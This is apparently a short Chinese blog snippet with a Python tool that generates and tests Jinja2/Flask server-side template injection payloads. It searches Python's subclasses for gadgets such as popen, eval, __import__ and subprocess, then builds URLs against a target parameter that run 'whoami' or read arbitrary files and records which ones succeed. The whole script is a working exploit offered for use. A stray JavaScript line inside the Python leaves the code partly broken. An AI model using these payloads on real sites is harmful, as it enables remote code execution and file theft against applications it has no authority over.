抛开代码丑不谈,用起来还是挺好用滴。
from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os
# 写入需注入的站点和url参数
site = "http://127.0.0.1:5000/waewe?404_url="
# url存储字典
url_dict = {
"popen": [],
"eval": [],
"__import__": [],
"subprocess": [],
}
# 通用[Python2、3]及绕过payload
currency_url = [
"通用payload_rce: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('whoami').read()\") }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_utf8: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='utf-8').read() }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_gbk: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='gbk').read() }}{% endif %}{% endfor %}\n"
]
# Python3特定payload,builtins也可以在Python2中使用
scan_list = {
"popen": ("__init__.__globals__", "['popen']('whoami').read()"),
"eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
"__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')"),
"subprocess": ("__init__.__globals__", "['subprocess'].check_output('whoami', shell=True).decode('gbk')"),
# "subprocess": ("__init__.__globals__", "['subprocess'].check_output('dir', shell=True).decode('utf8')"),
}
def scan():
num = 0
for item in "".__class__.__base__.__subclasses__():
try:
for ii in scan_list:
if ii in eval("item." + scan_list[ii][0]):
url = "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n" % (
site,
num,
scan_list[ii][0],
scan_list[ii][1]
)
url_dict[ii].append(url)
num += 1
except:
num += 1
def check_active(url, desc):
with open("result.txt", "a", encoding="utf-8") as f:
for i in url:
status_code = requests.get(i).status_code
if not status_code >= 500:
f.write("利用" + desc + ": " + i)
if __name__ == '__main__':
print("开始构造.....")
scan()
if os.path.exists("result.txt"):
os.remove("result.txt")
with open("result.txt", "a", encoding="utf-8") as f:
for i in currency_url:
f.write(i)
t_list = []
for i in url_dict:
t = Thread(target=check_active, args=(url_dict[i], i,))
t.start()
t_list.append(t)
for t in t_list:
t.join()
[1,2,3].slice(0,0)
print("创建完成,请查看当前路径下的 result.txt 文件!!")
